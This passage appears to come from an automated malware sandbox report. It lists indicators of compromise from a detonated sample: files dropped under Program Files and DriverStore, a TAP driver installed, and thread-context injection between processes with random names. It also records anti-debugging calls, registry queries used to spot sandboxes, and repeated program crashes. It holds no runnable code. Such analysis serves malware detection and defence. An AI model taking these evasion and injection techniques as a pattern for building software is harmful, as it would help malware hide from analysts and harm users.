Esplorarne.exe.comsvchost.exesvchost.exeDrvInst.exetapinstall.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt Esplorarne.exe.com File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent D45B7D20DAFB4D92 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 221FAF9E5B23604A svchost.exe File created C:\Windows\System32\DriverStore\Temp\{377a25ce-3071-1649-87b3-a95a9870995f}\SET8F2.tmp Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\Temp\{377a25ce-3071-1649-87b3-a95a9870995f}\SET903.tmp Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\Temp\{377a25ce-3071-1649-87b3-a95a9870995f} Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\Temp\{377a25ce-3071-1649-87b3-a95a9870995f}\oemvista.inf Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\Temp\{377a25ce-3071-1649-87b3-a95a9870995f}\tap0901.sys Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat Esplorarne.exe.com File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{377a25ce-3071-1649-87b3-a95a9870995f}\SET8F1.tmp Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\Temp\{377a25ce-3071-1649-87b3-a95a9870995f}\tap0901.cat Esplorarne.exe.com File created C:\Windows\System32\DriverStore\Temp\{377a25ce-3071-1649-87b3-a95a9870995f}\SET903.tmp Esplorarne.exe.com File created C:\Windows\System32\DriverStore\drvstore.tmp Esplorarne.exe.com File created C:\Windows\System32\DriverStore\Temp\{377a25ce-3071-1649-87b3-a95a9870995f}\SET8F1.tmp Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\Temp\{377a25ce-3071-1649-87b3-a95a9870995f}\SET8F2.tmp Esplorarne.exe.com File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys Esplorarne.exe.com File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
Processes:
O1bmzy6hcL_ue4W6_oFG7oRj.exeszjOvCqo9VEEZPC9Tfhj3aWF.exeERnyngf0jZ4AXCtsC6Vzb5fr.exeo0Ijha8Q2DH1BTZIg1gYYTJV.exec5qWDS3aQr1E9rlSpJ4auzrA.exeECvDauLMIp4oydGLLNSJGk70.exeB2D5.exeEsplorarne.exe.comEsplorarne.exe.commask_svc.exepid process 1388 O1bmzy6hcL_ue4W6_oFG7oRj.exe 1792 szjOvCqo9VEEZPC9Tfhj3aWF.exe 1928 ERnyngf0jZ4AXCtsC6Vzb5fr.exe 6108 o0Ijha8Q2DH1BTZIg1gYYTJV.exe 6544 c5qWDS3aQr1E9rlSpJ4auzrA.exe 1428 ECvDauLMIp4oydGLLNSJGk70.exe 5856 B2D5.exe 8388 Esplorarne.exe.com 7216 Esplorarne.exe.com 9168 mask_svc.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
hBS_VbW.EXEpihzVpjsMBxeP2HpzjpDHV4j.exe0iH1ZoEGEfyOl63MBMIV3FJl.exesvchost.exeConhost.exeEsplorarne.exe.comRUNDLL32.EXEEsplorarne.exe.comdescription pid process target process PID 500 set thread context of 772 500 hBS_VbW.EXE Qv0NxjyB_7TwiACykTPQ3vaQ.exe PID 3696 set thread context of 4268 3696 pihzVpjsMBxeP2HpzjpDHV4j.exe pihzVpjsMBxeP2HpzjpDHV4j.exe PID 2204 set thread context of 3252 2204 0iH1ZoEGEfyOl63MBMIV3FJl.exe 0iH1ZoEGEfyOl63MBMIV3FJl.exe PID 2804 set thread context of 5588 2804 svchost.exe svchost.exe PID 5604 set thread context of 6588 5604 Conhost.exe 0j1XEd3i2H8D1EkGWbm2zOLn.exe PID 5188 set thread context of 7536 5188 Esplorarne.exe.com Ha79_rA1g4ditmRiGRYfiX54.exe PID 1952 set thread context of 8756 1952 RUNDLL32.EXE rundll32.exe PID 8824 set thread context of 8040 8824 Esplorarne.exe.com grwjjwv -
Drops file in Program Files directory 64 IoCs
Processes:
Setup.exeSetup.tmplDjuHqMg4MkTM1qdSGZyxIsk.exeSetup.tmpultramediaburner.tmp3377047_logo_media.exemd8_8eus.exel9X2Jx_Lg4H2EzxeTz_OK_yb.exeSetup.exedescription ioc process File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-TFFCH.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-OD0C4.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-B6RJQ.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-M9938.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe lDjuHqMg4MkTM1qdSGZyxIsk.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-7SAE3.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-KA8FI.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-QSN50.tmp Setup.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg Setup.tmp File created C:\Program Files\Windows Photo Viewer\BNDPNRMQKM\ultramediaburner.exe.config 3377047_logo_media.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe Setup.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files (x86)\INL Corpo Brovse\unins000.dat Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-5SFB8.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Setup.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\javaw.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-33E6P.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini lDjuHqMg4MkTM1qdSGZyxIsk.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe l9X2Jx_Lg4H2EzxeTz_OK_yb.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\MaskVPN\is-0BAQ1.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-BO68N.tmp Setup.tmp File opened for modification C:\Program Files (x86)\INL Corpo Brovse\libcueify.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-S5A15.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-A7S1U.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-JGRJO.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-HBV0M.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe lDjuHqMg4MkTM1qdSGZyxIsk.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW md8_8eus.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-IG3PF.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-M4I8A.tmp Setup.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-KO14O.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\unins000.dat Setup.tmp File created C:\Program Files (x86)\Company\NewProduct\tmp.edb md8_8eus.exe File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-6SBRB.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-G9077.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe Setup.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-SF0PO.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-8T0B5.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-BC3Q9.tmp Setup.tmp File opened for modification C:\Program Files (x86)\INL Corpo Brovse\libass.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-JSTTC.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-UL7SA.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe Setup.exe -
Drops file in Windows directory 28 IoCs
Processes:
msiexec.exeEsplorarne.exe.comDrvInst.exeexpand.exeEsplorarne.exe.comEsplorarne.exe.comtapinstall.exedescription ioc process File opened for modification C:\Windows\Installer\MSID1DA.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log Esplorarne.exe.com File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\MSI84E6.tmp msiexec.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Installer\MSI1F46.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT Esplorarne.exe.com File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIAF1E.tmp msiexec.exe File opened for modification C:\Windows\inf\oem2.inf Esplorarne.exe.com File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File created C:\Windows\Installer\f78a933.msi msiexec.exe File opened for modification C:\Windows\Installer\f78a933.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIDE60.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log Esplorarne.exe.com File opened for modification C:\Windows\Installer\MSID333.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID4CA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1919.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE2F5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1AD0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1BCB.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI2A06.tmp msiexec.exe File created C:\Windows\inf\oem2.inf Esplorarne.exe.com File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4924 3800 WerFault.exe K2F3HK3oxaqe4XumGVM8K2CN.exe 5056 3800 WerFault.exe K2F3HK3oxaqe4XumGVM8K2CN.exe 1172 3800 WerFault.exe K2F3HK3oxaqe4XumGVM8K2CN.exe 4232 3800 WerFault.exe K2F3HK3oxaqe4XumGVM8K2CN.exe 4252 3800 WerFault.exe K2F3HK3oxaqe4XumGVM8K2CN.exe 4960 3800 WerFault.exe K2F3HK3oxaqe4XumGVM8K2CN.exe 4420 3800 WerFault.exe K2F3HK3oxaqe4XumGVM8K2CN.exe 6996 512 WerFault.exe customer3.exe 5236 7152 WerFault.exe 4qT_ZXYUxFI9rinCIBBgh5r1.exe 4368 5472 WerFault.exe k4UovMAQmmQbmhxqLe6V1i_X.exe 6272 5472 WerFault.exe k4UovMAQmmQbmhxqLe6V1i_X.exe 5420 5472 WerFault.exe k4UovMAQmmQbmhxqLe6V1i_X.exe 5964 5472 WerFault.exe k4UovMAQmmQbmhxqLe6V1i_X.exe 3256 5472 WerFault.exe k4UovMAQmmQbmhxqLe6V1i_X.exe 7468 5472 WerFault.exe k4UovMAQmmQbmhxqLe6V1i_X.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exegrwjjwvtapinstall.exeEsplorarne.exe.comEsplorarne.exe.comtapinstall.exedcwjjwvDrvInst.exeu_WsNa6cDylZ6Kk8IXnl9Dwe.exe0j1XEd3i2H8D1EkGWbm2zOLn.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI grwjjwv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dcwjjwv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI grwjjwv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dcwjjwv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom Esplorarne.exe.com Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u_WsNa6cDylZ6Kk8IXnl9Dwe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0j1XEd3i2H8D1EkGWbm2zOLn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RUNDLL32.EXERUNDLL32.EXERUNDLL32.EXEsvchost.exeLQpkvFjI8aWyyhYArcEYGJhT.exeep_w4UBkXtmsr5S8c_BCYuj9.exerunvd.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision 